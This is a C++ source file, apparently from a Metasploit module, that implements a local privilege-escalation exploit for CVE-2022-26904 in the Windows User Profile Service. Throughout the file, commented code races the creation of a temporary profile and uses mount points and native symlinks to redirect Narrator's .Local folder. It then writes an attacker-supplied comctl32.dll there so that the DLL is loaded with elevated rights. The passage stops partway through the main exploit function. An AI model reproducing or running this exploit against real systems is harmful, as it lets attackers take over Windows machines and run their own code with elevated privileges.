metasploit-gs/external/source/exploits/CVE-2022-26904/SuperProfileDLL/ProfSvcLPE.cpp

// SuperProfile vulnerability
// works on all windows versions
// tested on Windows 10 21H2, Windows 11, Windows Server 2022
#include <iostream>
#include <stdio.h>
#include <Windows.h>
#include <UserEnv.h>
#include <lmcons.h>
#include <conio.h>
#include <ShlObj.h>
#include <AclAPI.h>
#include <sddl.h>
#include <TlHelp32.h>
#include "Win-Ops-Master.h"
#include "resource.h"
#include "shellapi.h"
#include "stdio.h"
#pragma warning(disable : 4996)
#pragma comment(lib,"userenv.lib")
#pragma comment(lib,"shlwapi.lib")


HANDLE _token = nullptr;
OpsMaster op;
wchar_t* user_temp_dir = nullptr;
wchar_t* appdata = nullptr;
wchar_t* appdata_local = nullptr;
wchar_t* appdata_local_appdata = nullptr;
HANDLE happdata_local = nullptr;
HANDLE happdata = nullptr;
lock_ptr appdata_lock = nullptr;
HANDLE hlnk = nullptr;

#define MY_PRINTF(...) {wchar_t cad[1000]; swprintf_s(cad, 1000, __VA_ARGS__);  OutputDebugStringW(cad);}

// Custom error function to print out more descriptive messages about errors that may occur.
void err(const wchar_t* fc, DWORD err, DWORD line) {
	LPCWSTR errbuff = nullptr;
	int sz = FormatMessageW(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, err, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPWSTR)&errbuff, NULL, NULL);
	if (sz == 0) {
		MY_PRINTF(L"Couldn't format error message inside err function!\r\n");
	}
	else {
		MY_PRINTF(L"%s has returned an unexpected error %d in line %d\n%s", fc, err, line, errbuff);
	}
	HeapFree(GetProcessHeap(), NULL, (LPVOID)errbuff);
	ExitProcess(1);
}

// Custom thread structure to allow passing around the username
// and password needed to log in as the seperate user.
struct thread_argv {
	const wchar_t* username;
	const wchar_t* domain;
	const wchar_t* password;
};

// Main worker thread created by CreateThread().
// The only responsibilty of this worker is to create a suspended process given user credentials,
// check that it was started, and then terminate the process once it has been created.
DWORD WINAPI worker(void* argv) {
	// Get the size of the full path to msiexec.exe by expanding the string %windir%\\System32\\msiexec.exe,
	// then allocate this ammount of memory using HeapAlloc() on the process heap, and save the expanded
	// string into this allocated memory, aka msi.
	DWORD sz = ExpandEnvironmentStringsW(L"%windir%\\System32\\msiexec.exe", nullptr, 0);
	if (sz == 0) {
		MY_PRINTF(L"Failed to expand path to EXE inside worker function!\r\n");
		ExitProcess(2);
	}

	wchar_t* msi = (wchar_t*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sz * sizeof(wchar_t));
	if (msi == NULL) {
		MY_PRINTF(L"worker couldn't allocate memory for msi!\r\n");
		ExitProcess(3);
	}

	if (ExpandEnvironmentStringsW(L"%windir%\\System32\\msiexec.exe", msi, sz) == 0) {
		MY_PRINTF(L"Failed to expand path to EXE inside worker function!\r\n");
		ExitProcess(4);
	}

	// Get the thread arguments, save it into the variable tav.
	thread_argv* tav = (thread_argv*)argv;
	STARTUPINFOW si = { 0 };
	PROCESS_INFORMATION pi = { 0 };

	// Using CreateProcessWithLogonW, create a new msiexec.exe process using the provided
	// username and password. Use LOGON_WITH_PROFILE to ensure that the user profile is loaded using the HKEY_USERS registry key.
	//
	// Whilst in theory we could use LOGON_NETCREDENTIALS_ONLY as we don't need to load the users profile, closer inspection shows
	// that this only allows for the credentials to be used over the network, not locally as is the case here.
	//
	// Specify no arguments as we just want the process to be created, and specify the process creation flags as
	// CREATE_SUSPENDED so that we create the process in a suspended state.
	if (!CreateProcessWithLogonW(tav->username, tav->domain, tav->password,
		LOGON_WITH_PROFILE, msi, NULL, CREATE_SUSPENDED, NULL, NULL,
		&si, &pi)) {
		err(L"CreateProcessWithLogonW", GetLastError(), __LINE__);
	}

	// Once we have created the suspended process, then terminate it with ERROR_SUCCESS exit code,
	// close the handle to all of the process threads and the main process itself,
	// free the msi heap memory, and return ERROR_SUCCESS to signal the thread itself.
	if (!TerminateProcess(pi.hProcess, ERROR_SUCCESS)) {
		err(L"TerminateProcess", GetLastError(), __LINE__);
	}
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	HeapFree(GetProcessHeap(), NULL, msi);
	return ERROR_SUCCESS;
}

// Early declaration of callback2 so that callback1 can use it properly.
void callback2();

// Essentially a remove subdirectory and subfolders function that doesn't delete parent directories or the current directory.
// However if provided a reparse point or a normal file it will straight up delete that.
bool RemoveDirNotParent(std::wstring dir)
{
	// First get the attributes for the file specified. If it is a normal file, delete using DeleteFileNative.
	// Otherwise if it is a reparse point, then delete it using RemoveDirectoryW().
	DWORD fst_attr = GetFileAttributesW(dir.c_str());
	if (fst_attr == INVALID_FILE_ATTRIBUTES) {
		MY_PRINTF(L"Was not able to get file attributes inside RemoveDirNotParent() for file %s! Error was %i\r\n", dir.c_str(), GetLastError());
		ExitProcess(5);
	}

	if (fst_attr & FILE_ATTRIBUTE_NORMAL)
		return op.DeleteFileNative(dir);
	if (fst_attr & FILE_ATTRIBUTE_REPARSE_POINT)
		return RemoveDirectoryW(dir.c_str());

	// If the file is not a normal file or a reparse point, then
	// set search_path to the pattern to search for
	// any subdirectories or files under the directory.
	//
	// Also set s_p to the path of the current directory being
	// processed, but with a \ at the end.
	std::wstring search_path = std::wstring(dir) + L"\\*.*";
	std::wstring s_p = std::wstring(dir) + std::wstring(L"\\");
	WIN32_FIND_DATAW fd;
	HANDLE hFind = FindFirstFileW(search_path.c_str(), &fd);
	if (hFind != INVALID_HANDLE_VALUE) {
		do {
			// If we find the current entry is . or .. then skip it.
			if (wcscmp(fd.cFileName, L".") == 0 || wcscmp(fd.cFileName, L"..") == 0)
			{
				continue;
			}

			// If the subdirectory is a reparse point, remove it using RemoveDirectoryW().
			if (fd.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT) {
				if (RemoveDirectoryW(std::wstring(s_p + fd.cFileName).c_str()) == FALSE) {
					MY_PRINTF(L"Couldn't remove directory %s! Error was %i", std::wstring(s_p + fd.cFileName).c_str(), GetLastError());
					ExitProcess(6);
				}
				continue;
			}

			// If the subdirectory is not a normal directory, remove it using DeleteFileNative()
			if (!(fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
				if (op.DeleteFileNative(std::wstring(s_p + fd.cFileName)) == FALSE) {
					MY_PRINTF(L"Couldn't remove file %s! Error was %i", std::wstring(s_p + fd.cFileName).c_str(), op.GetLastErr());
					ExitProcess(7);
				}
				continue;
			}

			// Otherwise if it is a directory and its not . or .., then remove the directory recursively
			if (wcscmp(fd.cFileName, L".") != 0 && wcscmp(fd.cFileName, L"..") != 0)
			{
				if (op.RRemoveDirectory(s_p + fd.cFileName) == FALSE) {
					DWORD lastError = op.GetLastErr();
					if ((lastError != ERROR_SUCCESS) && (lastError != ERROR_FILE_NOT_FOUND)) {
						MY_PRINTF(L"Was unable to remove the directory %s inside RemoveDirNotParent()! Error was %i\r\n", std::wstring(s_p + fd.cFileName).c_str(), op.GetLastErr());
					}
				}
			}
		} while (FindNextFileW(hFind, &fd)); // Continue until no more results matching search pattern.
		FindClose(hFind); // When all done, close the find handle.
	}
	return true;
}

void callback1() {
	// First, impersonate the user we provided the credentials for since some of these directories won't be accessible otherwise.
	if (!ImpersonateLoggedOnUser(_token))
		err(L"ImpersonateLoggedOnUser", GetLastError(), __LINE__);

	// Move the file at C:\\Users\\TEMP.WIN11-TEST.022\\AppData\\Local or similar to the system temp directory at C:\Windows\Temp
	if (!op.MoveFileToTempDir(happdata_local, USE_SYSTEM_TEMP_DIR))
		err(L"MoveFileToTempDir", op.GetLastErr(), __LINE__);

	// Remove the entire C:\\Users\\TEMP.WIN11-TEST.022\\AppData\\Local directory.
	if (!op.DeleteByHandle(happdata_local))
		err(L"DeleteByHandle", op.GetLastErr(), __LINE__);

	// Remove all subdirectories and subfolders of the C:\\Users\\TEMP.WIN11-TEST.022\\AppData\\ directory.
	if (!RemoveDirNotParent(appdata)) {
		MY_PRINTF(L"Could not recursively delete %s using RemoveDirNotParent!\r\n", appdata);
		ExitProcess(9);
	}

	// Move the folder at C:\\Users\\TEMP.WIN11-TEST.022\\AppData or similar to the system temp directory at C:\Windows\Temp
	if (!op.MoveFileToTempDir(std::wstring(appdata), true, USE_SYSTEM_TEMP_DIR))
		err(L"MoveFileToTempDir", op.GetLastErr(), __LINE__);

	// Create the directory C:\\Users\\TEMP.WIN11-TEST.022\\AppData and save the handle into happdata
	happdata = op.OpenDirectory(appdata, GENERIC_READ | GENERIC_WRITE, ALL_SHARING);
	if (!happdata)
		err(L"OpenDirectory", op.GetLastErr(), __LINE__);

	// Create a mount point at C:\\Users\\TEMP.WIN11-TEST.022\\AppData to C:\Users\Default\Appdata
	if (!op.CreateMountPoint(happdata, L"C:\\Users\\Default\\Appdata"))
		err(L"CreateMountPoint", op.GetLastErr(), __LINE__);

	// Create a lock on C:\\Users\\TEMP.WIN11-TEST.022\\AppData, and have it call callback2 when activated.
	appdata_lock = op.CreateLock(happdata, callback2);

	// If appdata_lock is not set, then error out as it should have been set by now.
	if (!appdata_lock)
		err(L"CreateLock", op.GetLastErr(), __LINE__);

	// Before returning, call rev2self to ensure we are executing as the current user and not as the user we impersonated.
	if (RevertToSelf() == FALSE) {
		MY_PRINTF(L"Failed to return to executing as the current user and not the impersonated user inside callback1!\r\n");
		ExitProcess(10);
	}
}

void callback2() {
	// Impersonate the user we were provided credentials for.
	if (!ImpersonateLoggedOnUser(_token))
		err(L"ImpersonateLoggedOnUser", GetLastError(), __LINE__);

	// Delete the mount point at C:\\Users\\TEMP.WIN11-TEST.022\\AppData such that it still exists but no longer points to C:\\Users\\Default\\Appdata
	if (!op.DeleteMountPoint(happdata))
		err(L"DeleteMountPoint", op.GetLastErr(), __LINE__);

	// Open the directory at C:\\Users\\TEMP.WIN11-TEST.022\\AppData\\Local with write permissions, full sharing, and always open even if it exists.
	happdata_local = op.OpenDirectory(appdata_local, GENERIC_WRITE, ALL_SHARING, OPEN_ALWAYS);
	if (!happdata_local)
		err(L"OpenDirectory", op.GetLastErr(), __LINE__);

	// Once we have a handle to C:\\Users\\TEMP.WIN11-TEST.022\\AppData\\Local, turn it from a mount point to C:\\Users\\Default\\Appdata to
	// a mount point to \\BaseNamedObjects\\Restricted, and then close the handle to C:\\Users\\TEMP.WIN11-TEST.022\\AppData\\Local
	if (!op.CreateMountPoint(happdata_local, L"\\BaseNamedObjects\\Restricted"))
		err(L"CreateMountPoint", op.GetLastErr(), __LINE__);

	// Finally, create a native symbolic link from \\BaseNamedObjects\\Restricted\\Application Data to \\??\\C:\\Windows\\System32\\Narrator.exe.Local
	// This will make C:\\Users\\TEMP.WIN11-TEST.022\\AppData\\Local\\Application Data point to C:\\Windows\\System32\\Narrator.exe.Local
	hlnk = op.CreateNativeSymlink(L"\\BaseNamedObjects\\Restricted\\Application Data", L"\\??\\C:\\Windows\\System32\\Narrator.exe.Local");
	if (!hlnk)
		err(L"CreateNativeSymlink", op.GetLastErr(), __LINE__);

	// Before returning, call rev2self to ensure we are executing as the current user and not as the user we impersonated.
	if (RevertToSelf() == FALSE) {
		MY_PRINTF(L"Failed to return to executing as the current user and not the impersonated user inside callback2!\r\n");
		ExitProcess(11);
	}
	CloseHandle(happdata_local);
}

// Drop the payload at \\BaseNamedObjects\\Restricted\\Application Data\\C:\\Windows\\System32\\Narrator.exe.Local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.22000.1_none_271a8fad6a2d1b1e\\comctl32.dll
// or a similar path.
void DoDropPayload(const wchar_t* dllPath) {
	// XXX Following two blocks of code need to be removed and replaced with
	// a way to load the DLL somehow from Metasploit vs compiling it into the EXE.
	HANDLE hDLLFile = CreateFileW(dllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDLLFile == INVALID_HANDLE_VALUE) {
		DWORD error = GetLastError();

		//MessageBoxW(NULL, dllPath, L"Unable to open DLL file!", MB_OK);
		ExitProcess(12);
	}
	DWORD DllSize = GetFileSize(hDLLFile, NULL);
	DWORD bytesRead = 0;
	char* DllBuff = new char[DllSize + 1];
	if (ReadFile(hDLLFile, DllBuff, DllSize, &bytesRead, NULL) == FALSE) {
		//MessageBoxW(NULL, dllPath, L"Unable to read DLL file!", MB_OK);
		ExitProcess(13);
	}

	// Next we will use an empty WIN32_FIND_DATA structure to get the first file location matching the pattern
	// C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_*_none_*, and save the search handle into hfind.
	// Results of the file found to match the query will be saved into the data variable.
	WIN32_FIND_DATAW data = { 0 };
	HANDLE hfind = FindFirstFileW(L"C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_*_none_*", &data);
	if (hfind == INVALID_HANDLE_VALUE) {
		MY_PRINTF(L"Couldn't find a file matching the WinSxS pattern! Are you sure this is an AMD64 machine?\r\n");
		ExitProcess(14);
	}
	std::wstring narrator_dir = L"C:\\Windows\\System32\\Narrator.exe.Local\\";

	// Remember that at this point C:\\Windows\\System32\\Narrator.exe.Local should point to C:\Users\TEMP\AppData\Local
	// and that \\BaseNamedObjects\\Restricted\\Application Data points to C:\\Windows\\System32\\Narrator.exe.Local, which in turn points to C:\Users\TEMP\AppData\Local
	// C:\\Windows\\System32\\Narrator.exe.Local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.22000.1_none_271a8fad6a2d1b1e
	// is an example of the value of _dll_dir here which therefore points to
	// C:\Users\TEMP\AppData\Local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.22000.1_none_271a8fad6a2d1b1e in practice.
	//
	// We will then create this directory using CreateDirectoryW() call.
	std::wstring _dll_dir = narrator_dir + data.cFileName;
	if (CreateDirectoryW(_dll_dir.c_str(), NULL) == FALSE) {
		MY_PRINTF(L"Could not create directory %s as we encountered error %i\r\n", _dll_dir.c_str(), GetLastError());
		ExitProcess(15);
	}

	// Next we create the file
	// \\BaseNamedObjects\\Restricted\\Application Data\\C:\\Windows\\System32\\Narrator.exe.Local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.22000.1_none_271a8fad6a2d1b1e\\comctl32.dll
	// and overwrite its contents with the contents of the DLL we specify.
	std::wstring _dll = _dll_dir + L"\\comctl32.dll";
	HANDLE hdll = op.OpenFileNative(_dll, GENERIC_WRITE, ALL_SHARING, CREATE_ALWAYS);
	if (hdll == NULL) {
		MY_PRINTF(L"Couldn't open file at %s for writing! Error was: %i\r\n!", _dll.c_str(), op.GetLastErr());
		ExitProcess(16);
	}

	// XXX This needs to be updated so that it writes the right DLL data.
	if (op.WriteFileNative(hdll, DllBuff, DllSize) == FALSE) {
		MY_PRINTF(L"Couldn't write file at %s! Error was: %i\r\n!", _dll.c_str(), op.GetLastErr());
		ExitProcess(17);
	}

	// Whilst we still have other matches on C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_*_none_* pattern,
	// continue to overwrite their versions of comctl32.dll with our malicious DLL copy to ensure we can gain control.
	//
	// Note that interestingly these files are reset back to legit copies after the exploit ends so implications of doing this aren't so bad.
	//
	// This will result in more directories at \\BaseNamedObjects\\Restricted\\Application Data\\<value of data.cFileName> and more
	// \\BaseNamedObjects\\Restricted\\Application Data\\<value of data.cFileName>\\comctl32.dll files.
	while (FindNextFileW(hfind, &data) == TRUE) {
		_dll_dir = narrator_dir + data.cFileName;
		if (CreateDirectoryW(_dll_dir.c_str(), NULL) == FALSE) {
			MY_PRINTF(L"Couldn't create directory %s! Error was: %i\r\n", _dll_dir.c_str(), GetLastError());
			delete[] DllBuff;
			ExitProcess(18);
		}
		_dll = _dll_dir + L"\\comctl32.dll";
		hdll = op.OpenFileNative(_dll, GENERIC_WRITE, ALL_SHARING, CREATE_ALWAYS);
		if (hdll == NULL) {
			MY_PRINTF(L"Couldn't open file at %s for writing! Error was: %i\r\n", _dll.c_str(), op.GetLastErr());
			delete[] DllBuff;
			ExitProcess(19);
		}
		if (op.WriteFileNative(hdll, DllBuff, DllSize) == FALSE) {
			MY_PRINTF(L"Couldn't write file at %s! Error was: %i\r\n", _dll.c_str(), op.GetLastErr());
			CloseHandle(hdll);
			delete[] DllBuff;
			ExitProcess(20);
		}
	}
	FindClose(hfind);
	CloseHandle(hdll);
	CloseHandle(hDLLFile);
	delete[] DllBuff;
	return;
}

wchar_t* GetWC(char* c) {
	const size_t cSize = strlen(c) + 1;
	wchar_t* wc = new wchar_t[cSize];
	mbstowcs(wc, c, cSize);
	return wc;
}

// Main entry of program.
int exploit(char* incomingData) {
	// Convert data from Metasploit into local wchar_t string pointers.
	// First initialize the call with the string we want to split
	wchar_t* login_user = GetWC(strtok(incomingData, "||"));
	wchar_t* login_domain = GetWC(strtok(NULL, "||"));
	wchar_t* login_password = GetWC(strtok(NULL, "||"));
	wchar_t* dllPath = GetWC(strtok(NULL, "||"));

	// Use ExpandEnvironmentStringsW() to check that the current user is not the same as the user provided for the login.
	wchar_t current_user[512];

	// Same check but using the user domain to double check we didn't specify a domain format of a username. Just to make sure :)
	if (ExpandEnvironmentStringsW(L"%USERDOMAIN%\\%USERNAME%", current_user, 512) == 0) {
		MY_PRINTF(L"Couldn't expand USERDOMAIN\\USERNAME environment variable! Error was %i\r\n", GetLastError());
		ExitProcess(22);
	}
	if (!wcsicmp(current_user, login_user)) {
		printf("The current user and the specified user cannot be the same.");
		return 1;
	}

	// Using the provided username and password, attempt to log on with the provided username,
	// password, and domain to the local computer. Also specify that we want an interactive
	// logon session and specify that we want to use the default provider.
	//
	// Save the information on the logon token that will be returned by this call
	// to the _token global variable.
	if (!LogonUserW(login_user, login_domain, login_password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &_token))
		err(L"LogonUserW", GetLastError(), __LINE__); // If we errored on the login then print out an error and exit.

	// Set high priority class on our process to ensure its classed as a time-critical process that must be executed immediately
	// and therefore must be executed before normal or idle priority class processes, and can use as much CPU time as it needs
	// unless interrupted by a higher priority process.
	if (!SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS)) {
		err(L"SetPriorityClass", GetLastError(), __LINE__);
	}

	// Set the thread priority to time critical aka level 15, the highest thread priority possible besides level 31 for REALTIME_PRIORITY_CLASS.
	// This ensures that we don't interrupt system critical threads, but we are as high priority as possible to ensure the threads get the chance
	// they need to win this race.
	if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL)) {
		err(L"SetThreadPriority", GetLastError(), __LINE__);
	}

	// Enable file system redirection for the calling thread. Parameter is FALSE since it must be a PVOID that holds the old value but we don't care about this.
	//if (!Wow64EnableWow64FsRedirection(FALSE)) {
	//	err(L"Wow64EnableWow64FsRedirection", GetLastError(), __LINE__);
	//}

	// Originally this code called the function worker() and pass it in the login username and password as parameters,
	// then waited infinitely for the thread to be signaled. Personally I found this wasn't needed, and the only
	// potential benefit was loading the user's profile, which doesn't seem to be needed in my tests on Windows 11.
	//
	// Therefore this code now just decleares hthread and thrd_argv as parameters for later calls.
	thread_argv thrd_argv = { login_user,login_domain,login_password };
	HANDLE hthread = NULL;

	// Okay we should now have the logon token for the user so lets run Narrator and don't specify a window to associate with,
	// use the "open" option to open a process, specify the path to Narrator, don't specify parameters, use the current directory,
	// and try to force minimize the window.
	CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);

	HINSTANCE shellResult = ShellExecuteW(NULL, L"open", L"C:\\Windows\\System32\\narrator.exe", NULL, NULL, SW_HIDE);
	if (shellResult < (HINSTANCE)32) {
		MY_PRINTF(L"Couldn't start Narrator.exe! Error was: %i\r\n", shellResult);
		ExitProcess(23);
	}

	// Check if we can impersonate the user we logged in as earlier
	// using ImpersonateLoggedOnUser(). If we can't then error out and exit.
	if (!ImpersonateLoggedOnUser(_token))
		err(L"ImpersonateLoggedOnUser", GetLastError(), __LINE__);

	// Get the environment strings for the user we logged in as, specifically for the string
	// C:\\Users\\%USERNAME%\\ntuser.dat, which is a hidden file located in every user profile
	// that contains the settings and preferences for each user (see https://www.howtogeek.com/401365/what-is-the-ntuser.dat-file/)
	//
	// Save the expanded string into the variable user_registry_path.
	//
	// Then we continously try to open this file using op.OpenFileNative until we can get a handle to it.
	wchar_t user_registry_path[MAX_PATH];
	int returnCode = wcscmp(login_domain, L".");
	wchar_t current_domain[512];
	ExpandEnvironmentStringsW(L"%USERDOMAIN%", current_domain, 512);
	int returnCodeTryTwo = wcscmp(login_domain, current_domain);
	if ((returnCode == 0) || (returnCodeTryTwo == 0)) {
		if (!ExpandEnvironmentStringsForUserW(_token, L"C:\\Users\\%USERNAME%\\ntuser.dat", user_registry_path, MAX_PATH)) {
			err(L"ExpandEnvironmentStringsForUser", GetLastError(), __LINE__);
		}
	}
	else {
		if (!ExpandEnvironmentStringsForUserW(_token, L"C:\\Users\\%USERNAME%\.%USERDOMAIN%\\ntuser.dat", user_registry_path, MAX_PATH)) {
			err(L"ExpandEnvironmentStringsForUser", GetLastError(), __LINE__);
		}
	}
	HANDLE huserdat = NULL;
	do {
		huserdat = op.OpenFileNative(user_registry_path, GENERIC_READ, NULL, OPEN_ALWAYS);
	} while (!huserdat);

	// At this point we now have a handle to C:\\Users\\%USERNAME%\\ntuser.dat.
	// We then open a handle to the C:\\Users directory with generic read access.
	HANDLE husers_dir = op.OpenDirectory("C:\\Users", GENERIC_READ);
	if (!husers_dir)
		err(L"OpenDirectory", op.GetLastErr(), __LINE__);

	// With a handle to both C:\\Users\\%USERNAME%\\ntuser.dat and to C:\\Users
	// we now create a new FILE_NOTIFY_INFORMATION structure in process heap memory
	// of size 4096, and zero the memory.
	FILE_NOTIFY_INFORMATION* fni = (FILE_NOTIFY_INFORMATION*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 4096);
	if (fni == NULL) {
		MY_PRINTF(L"Unable to allocate memory for file notification information!\r\n");
		ExitProcess(24);
	}
	wchar_t new_dir[MAX_PATH];

	// Create a new thread that will run worker() that will create a new suspended process, and then kill it.
	// Save the handle to this thread in hthread.
	hthread = CreateThread(NULL, NULL, worker, (void*)&thrd_argv, NULL, NULL);
	if (!hthread) {
		err(L"CreateThread", GetLastError(), __LINE__);
	}
	do {
		ZeroMemory(new_dir, MAX_PATH);
		DWORD ret_sz = 0;

		// Now we check to see if there were any changes to the C:\\Users directory, using fni as
		// the FILE_NOTIFY_INFORMATION structure to get the file changes, check for changes in subdirectories,
		// and specifically look for changes in the directory name of any directory at or below the level of C:\\Users.
		//
		// Save number of bytes read into ret_sz. This parameter is specified as this
		// call is sychronous and thus this parameter is required, but we don't do anything with the returned info.
		//
		// This call relies on our earlier CreateThread() call to make the modifications to the C:\\Users directory
		if (!ReadDirectoryChangesW(husers_dir, fni, 4096, TRUE, FILE_NOTIFY_CHANGE_DIR_NAME, &ret_sz, nullptr, nullptr))
			err(L"ReadDirectoryChangesW", GetLastError(), __LINE__);

		// If the only action that was peformed wasn't to add a file to a directory, then skip to next instance of the loop.
		// Otherwise if the action was to add a file to the directory, then we proceed to next instruction.
		if (fni->Action != FILE_ACTION_ADDED)
			continue;

		// Set new_dir aka the path where the file is being created, to the full filename of the new file that was created.
		memcpy(new_dir, fni->FileName, fni->FileNameLength);
		new_dir[fni->FileNameLength / 2] = L'\0'; // Make sure to NULL terminate the wchar path string inside new_dir.

		// If the path to the new file does not contain a directory within the path string,
		// then we skip the file and continue to the next change.
		// Otherwise we proceed with next steps.
		if (wcschr(new_dir, L'\\'))
			continue;

		// Bit of an odd check but check if the first 4 letters of the new path start with TEMP.
		// If they do, then continue as this is the file we are interested in. Otherwise jump to top
		// of the loop as this isn't a file we are interested in. This will look something like TEMP.WIN11-TEST.016
		// in practice.

		WCHAR cmp[5] = { 0 };
		wmemcpy(cmp, new_dir, 4);
		cmp[4] = L'\0';
		if (wcscmp(cmp, L"TEMP"))
			continue;

		// If we reached this point and none of the above apply, we have found the file that was
		// added to the directory we are after.
		break;
	} while (1);

	// Set total size to 10 + the length of the new file path. 10 specifically as that
	// is the length of the string C:\Users\ with a null terminator at the end.
	//
	// Then allocate this much memory, aka user_temp_dir_sz, using HeapAlloc() on
	// the process heap and save the resulting pointer into the variable user_temp_dir.
	size_t user_temp_dir_sz = (10 + lstrlenW(new_dir)) * sizeof(wchar_t);
	user_temp_dir = (wchar_t*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, user_temp_dir_sz);
	if (user_temp_dir == NULL) {
		MY_PRINTF(L"Unable to allocate memory for user_temp_dir!\r\n");
		ExitProcess(25);
	}

	// Now append the string C:\Users\ to the end of whatever is in the
	// variable new_dir and save this into user_temp_dir. In practice this
	// will look something like C:\\Users\\TEMP.WIN11-TEST.016
	wmemcpy(user_temp_dir, L"C:\\Users\\\0", 10);
	wcscat(user_temp_dir, new_dir);

	// Now create another heap allocation of size user_temp_dir_sz plus 6 extra bytes for the string \.lock
	// Save resulting memory pointer into lock_file variable and have it save the value of user_temp_dir
	// plus \.lock to the end of the path.
	//
	// This means lock_file will look something like C:\\Users\\TEMP.WIN11-TEST.016\\.lock
	wchar_t* lock_file = (wchar_t*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, user_temp_dir_sz + (6 * sizeof(wchar_t)));
	if (lock_file == NULL) {
		MY_PRINTF(L"Unable to allocate memory for the lock file!\r\n");
		ExitProcess(26);
	}
	wcscpy(lock_file, user_temp_dir);
	wcscat(lock_file, L"\\.lock");

	// Open a handle to this lock file in hlock_file and make it have generic read permissions,
	// plus DELETE so that the file is deleted when the handle is closed.
	//
	// This seems to be part of the race condition from what I can tell?? If we fail to create this file in time,
	// then the exploit will fail as the worker() thread will start cleaning up before our lock can be created.
	// If this happens that we won't be able to grab the lock and keep this open.
	HANDLE hlock_file = op.OpenFileNative(lock_file, GENERIC_READ | DELETE, NULL, CREATE_ALWAYS);
	if (!hlock_file)
		err(L"OpenFileNative", op.GetLastErr(), __LINE__);


	// Create 3 new heap allocations, each with zero'd out memory, on the process heap.
	// Each allocation is another subdirectory so we have:
	// \AppData
	// \AppData\Local
	// \AppData\Local\Application Data
	appdata = (wchar_t*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY | HEAP_GENERATE_EXCEPTIONS, user_temp_dir_sz + (8 * sizeof(wchar_t)));
	appdata_local = (wchar_t*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY | HEAP_GENERATE_EXCEPTIONS, user_temp_dir_sz + (14 * sizeof(wchar_t)));
	appdata_local_appdata = (wchar_t*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY | HEAP_GENERATE_EXCEPTIONS, user_temp_dir_sz + (31 * sizeof(wchar_t)));

	if ((appdata == NULL) || (appdata_local == NULL) || (appdata_local_appdata == NULL)) {
		MY_PRINTF(L"Couldn't allocate memory for AppData strings!\r\n");
		ExitProcess(27);
	}

	// Build up the strings, with appdata pointing to something like C:\\Users\\TEMP.WIN11-TEST.016\\AppData
	// appdata_local will point to something like C:\\Users\\TEMP.WIN11-TEST.016\\AppData\\Local
	// appdata_local_appdata will point to C:\\Users\\TEMP.WIN11-TEST.016\\AppData\\Local\\Application Data
	//
	wcscpy(appdata, user_temp_dir);
	wcscat(appdata, L"\\AppData\0");
	wcscpy(appdata_local, appdata);
	wcscat(appdata_local, L"\\Local\0");
	wcscpy(appdata_local_appdata, appdata_local);
	wcscat(appdata_local_appdata, L"\\Application Data\0");

	// Create the directory at C:\\Users\\TEMP.WIN11-TEST.016\\AppData
	int dir_cr_result = SHCreateDirectory(NULL, appdata);
	if (dir_cr_result != ERROR_SUCCESS) {
		MY_PRINTF(L"Couldn't create the AppData directory corresponding to the appdata variable! Error was: %i\r\n", dir_cr_result);
	}

	// Now to create a directory at C:\Windows\Temp\<random chars> such as C:\\Windows\\Temp\\{CC9BF9F3-5B31-47E4-8C61-49E609D7A2CE}
	wchar_t __tmp[MAX_PATH];
	if (ExpandEnvironmentStringsW(std::wstring(L"%windir%\\Temp\\" + op.GenerateRandomStr()).c_str(), __tmp, MAX_PATH) == 0) {
		MY_PRINTF(L"Could not expand the environment string for the Windows temp directory using ExpandEnviromentStrings()! Error: %i\r\n", GetLastError());
		ExitProcess(28);
	}


	// DACL with SE_DACL_PROTECTED flag set to prevent it being modified by inheritable ACEs,
	// and the SE_DACL_AUTO_INHERITED flag so that it is set up to automatically propagate to child objects.
	//
	// The actual flags are AceType: SDDL_ACCESS_ALLOWED, AceFlags: SDDL_OBJECT_INHERIT|SDDL_CONTAINER_INHERIT, Rights: FILE_ALL_ACCESS, WRITE_DAC
	//
	// This is then saved into the sd variable and the length of this structure is saved into sd_sz.
	//
	// Finally use this to create a new SECURITY_ATTRIBUTES structure in the variable sa with this info.
	PSECURITY_DESCRIPTOR sd;
	ULONG sd_sz = 0;
	if (ConvertStringSecurityDescriptorToSecurityDescriptorW(L"D:PAI(A;OICI;FA;;;WD)", SDDL_REVISION_1, &sd, &sd_sz) == FALSE) {
		MY_PRINTF(L"Couldn't create security descriptor from string! Error: %i\r\n", GetLastError());
		ExitProcess(29);
	}
	SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES),sd,FALSE };


	// Create a new directory at C:\Windows\Temp\<random chars> (in this case C:\\Windows\\Temp\\{CC9BF9F3-5B31-47E4-8C61-49E609D7A2CE}) with the provided security
	// descriptor that allows all access to the directory and write DAC access.
	if (!CreateDirectoryW(__tmp, &sa))
		err(L"CreateDirectory", GetLastError(), __LINE__);

	// Open up the directory at C:\\Users\\TEMP.WIN11-TEST.016\\AppData\\Local with local read and write permissions, and
	// the ability to delete the directory once done.
